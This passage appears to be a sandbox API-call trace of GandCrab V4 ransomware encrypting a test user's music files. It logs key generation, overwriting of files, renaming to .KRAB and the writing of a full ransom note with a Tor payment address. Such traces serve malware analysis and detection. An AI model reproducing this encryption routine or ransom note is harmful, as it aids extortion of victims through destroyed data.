YY\\l8ACBxU.m4a") returned 57 [0093.858] lstrlenW (lpString=".m4a") returned 4 [0093.858] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.858] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".m4a ") returned 5 [0093.858] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.858] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\l8ACBxU.m4a") returned 57 [0093.858] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\l8ACBxU.m4a") returned 57 [0093.858] lstrcmpiW (lpString1="l8ACBxU.m4a", lpString2="desktop.ini") returned 1 [0093.858] lstrcmpiW (lpString1="l8ACBxU.m4a", lpString2="autorun.inf") returned 1 [0093.859] lstrcmpiW (lpString1="l8ACBxU.m4a", lpString2="ntuser.dat") returned -1 [0093.859] lstrcmpiW (lpString1="l8ACBxU.m4a", lpString2="iconcache.db") returned 1 [0093.859] lstrcmpiW (lpString1="l8ACBxU.m4a", lpString2="bootsect.bak") returned 1 [0093.859] lstrcmpiW (lpString1="l8ACBxU.m4a", lpString2="boot.ini") returned 1 [0093.859] lstrcmpiW (lpString1="l8ACBxU.m4a", lpString2="ntuser.dat.log") returned -1 [0093.859] lstrcmpiW (lpString1="l8ACBxU.m4a", lpString2="thumbs.db") returned -1 [0093.859] lstrcmpiW (lpString1="l8ACBxU.m4a", lpString2="KRAB-DECRYPT.html") returned 1 [0093.859] lstrcmpiW (lpString1="l8ACBxU.m4a", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.859] lstrcmpiW (lpString1="l8ACBxU.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.859] lstrcmpiW (lpString1="l8ACBxU.m4a", lpString2="ntldr") returned -1 [0093.859] lstrcmpiW (lpString1="l8ACBxU.m4a", lpString2="NTDETECT.COM") returned -1 [0093.859] lstrcmpiW (lpString1="l8ACBxU.m4a", lpString2="Bootfont.bin") returned 1 [0093.859] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.859] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010df8) returned 1 [0093.860] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0093.861] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.861] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.861] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0093.861] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.861] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.861] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011898) returned 1 [0093.862] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0093.862] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.863] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.863] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0093.863] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0093.863] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.863] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0093.864] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd920) returned 1 [0093.864] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0093.864] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0093.864] GetLastError () returned 0x0 [0093.864] CryptDestroyKey (hKey=0xfbd920) returned 1 [0093.864] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.864] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011898) returned 1 [0093.955] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd920) returned 1 [0093.955] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0093.955] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0093.955] GetLastError () returned 0x0 [0093.955] CryptDestroyKey (hKey=0xfbd920) returned 1 [0093.955] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0093.955] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\l8ACBxU.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\l8acbxu.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0093.956] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0093.957] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0093.957] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x2f65, lpOverlapped=0x0) returned 1 [0094.024] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xffffd09b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.025] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2f65, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x2f65, lpOverlapped=0x0) returned 1 [0094.026] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0094.026] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.030] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.031] CloseHandle (hObject=0x778) returned 1 [0094.031] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.031] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\l8ACBxU.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\l8acbxu.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\l8ACBxU.m4a.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\l8acbxu.m4a.krab")) returned 1 [0094.032] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.032] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0094.033] lstrcmpW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2=".") returned 1 [0094.033] lstrcmpW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="..") returned 1 [0094.033] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\", lpString2="z0HrcUM51wHz0MivFQhK.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\z0HrcUM51wHz0MivFQhK.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\z0HrcUM51wHz0MivFQhK.m4a" [0094.033] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.034] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\z0HrcUM51wHz0MivFQhK.m4a.KRAB") returned 75 [0094.034] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\z0HrcUM51wHz0MivFQhK.m4a") returned 70 [0094.034] lstrlenW (lpString=".m4a") returned 4 [0094.034] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.034] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".m4a ") returned 5 [0094.034] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.035] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\z0HrcUM51wHz0MivFQhK.m4a") returned 70 [0094.035] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\z0HrcUM51wHz0MivFQhK.m4a") returned 70 [0094.035] lstrcmpiW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="desktop.ini") returned 1 [0094.035] lstrcmpiW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="autorun.inf") returned 1 [0094.035] lstrcmpiW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="ntuser.dat") returned 1 [0094.035] lstrcmpiW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="iconcache.db") returned 1 [0094.035] lstrcmpiW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="bootsect.bak") returned 1 [0094.035] lstrcmpiW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="boot.ini") returned 1 [0094.035] lstrcmpiW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="ntuser.dat.log") returned 1 [0094.035] lstrcmpiW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="thumbs.db") returned 1 [0094.035] lstrcmpiW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="KRAB-DECRYPT.html") returned 1 [0094.035] lstrcmpiW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.035] lstrcmpiW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.035] lstrcmpiW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="ntldr") returned 1 [0094.035] lstrcmpiW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="NTDETECT.COM") returned 1 [0094.035] lstrcmpiW (lpString1="z0HrcUM51wHz0MivFQhK.m4a", lpString2="Bootfont.bin") returned 1 [0094.035] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.035] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010df8) returned 1 [0094.036] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.036] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.037] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.037] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0094.037] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.037] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.037] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011898) returned 1 [0094.038] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.038] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.041] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.041] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0094.041] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0094.041] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.041] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x10111b0) returned 1 [0094.042] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd920) returned 1 [0094.042] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0094.042] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0094.042] GetLastError () returned 0x0 [0094.042] CryptDestroyKey (hKey=0xfbd920) returned 1 [0094.042] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0094.042] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0094.043] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd920) returned 1 [0094.043] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0094.043] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0094.043] GetLastError () returned 0x0 [0094.043] CryptDestroyKey (hKey=0xfbd920) returned 1 [0094.043] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.043] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\z0HrcUM51wHz0MivFQhK.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\z0hrcum51whz0mivfqhk.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0094.044] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.044] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.045] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0xec12, lpOverlapped=0x0) returned 1 [0094.059] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xffff13ee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.059] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xec12, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0xec12, lpOverlapped=0x0) returned 1 [0094.059] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0094.059] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.063] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.064] CloseHandle (hObject=0x778) returned 1 [0094.064] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.064] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\z0HrcUM51wHz0MivFQhK.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\z0hrcum51whz0mivfqhk.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\z0HrcUM51wHz0MivFQhK.m4a.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\z0hrcum51whz0mivfqhk.m4a.krab")) returned 1 [0094.065] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.066] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0094.066] FindClose (in: hFindFile=0xfbd7a0 | out: hFindFile=0xfbd7a0) returned 1 [0094.066] CloseHandle (hObject=0x3a8) returned 1 [0094.066] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0094.066] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0094.066] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0094.066] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\KRAB-DECRYPT.txt" [0094.066] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.066] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\KRAB-DECRYPT.txt.KRAB") returned 58 [0094.067] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\KRAB-DECRYPT.txt") returned 53 [0094.067] lstrlenW (lpString=".txt") returned 4 [0094.067] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.067] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0094.067] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.067] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\KRAB-DECRYPT.txt") returned 53 [0094.067] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\KRAB-DECRYPT.txt") returned 53 [0094.067] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.067] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.067] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0094.068] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.068] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.068] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.068] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0094.068] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0094.068] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0094.068] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0094.068] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.068] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0094.068] lstrcmpW (lpString1="oC1v6qnGcLk", lpString2=".") returned 1 [0094.068] lstrcmpW (lpString1="oC1v6qnGcLk", lpString2="..") returned 1 [0094.068] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\", lpString2="oC1v6qnGcLk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk" [0094.068] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\" [0094.068] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0094.069] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.069] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.069] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.069] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.069] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.070] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.070] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\\\KRAB-DECRYPT.txt") returned 66 [0094.070] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0094.071] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a